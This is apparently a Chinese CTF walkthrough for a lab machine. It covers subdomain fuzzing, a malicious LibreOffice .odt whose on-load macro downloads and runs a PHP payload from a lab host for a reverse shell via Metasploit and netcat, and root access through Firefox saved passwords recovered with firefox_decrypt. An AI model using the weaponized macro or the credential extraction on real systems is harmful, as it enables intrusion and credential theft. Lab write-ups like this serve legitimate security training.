本文最后更新于361 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com
一、信息收集
使用wfuzz 收集子域名
二、获得立足点
LibreOffice是一款替代Microsoft Word、Excel等的开源办公软件,有Calc、Writer等多种应用程序。支持的文件扩展名也多种多样,例如 .odf、.odp、odt (OpenDocument)、.odb (OpenOffice Base) 等。
Microsoft 创建了许多 Office 文档格式,主要有两种类型:OLE 格式(如 RTF、DOC、XLS、PPT)和Office Open XML (OOXML) 格式(如 DOCX、XLSX、PPTX)。这些格式可能包含宏,使其成为网络钓鱼和恶意软件的目标。 OOXML 文件的结构为 zip 容器,允许通过解压缩进行检查,显示文件和文件夹层次结构以及 XML 文件内容
msfconsole #使用msf 生成一个.odt 的模板文件
use exploit/multi/misc/openoffice_document_macro
set payload generic/shell_reverse_tcp
run # 会提示生成了一个文件
cp /xxx/xx/msf.odt /tmp
unzip msf.odt
vim Basic/Standard/Module1.xml
zip -r msf.odt * #保持目录结构 压缩为 .odt 文件
unzip -l msf.odt #查看是否有目录结构
cat Basic/Standard/Module1.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd">
<script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1"
script:language="StarBasic">REM ***** BASIC *****
Sub Onload
Shell("wget 'http://192.168.56.5:8000/htb.php -O /tmp/1.php' ")
Shell("php /tmp/1.php")
End Sub
</script:module>
nc -lvp 123将msf.odt 上传到服务器 等待反弹shell
获得shell
三、提权
使用firefox_decrypt 破解firefox配置文件中的密码
git clone https://github.com/unode/firefox_decrypt.git
cd firefox_decrypt
find . -name "logins.json" #在firefox 的配置文件目录 /firefox/common/.mozilla 下面寻找 一个 login.json 文件,在文件所在目录,进行破解
python3 firefox_decrypt.py ../firefox/common/.mozilla/firefox/ii990jpt.default/获得一个密码 登陆 root
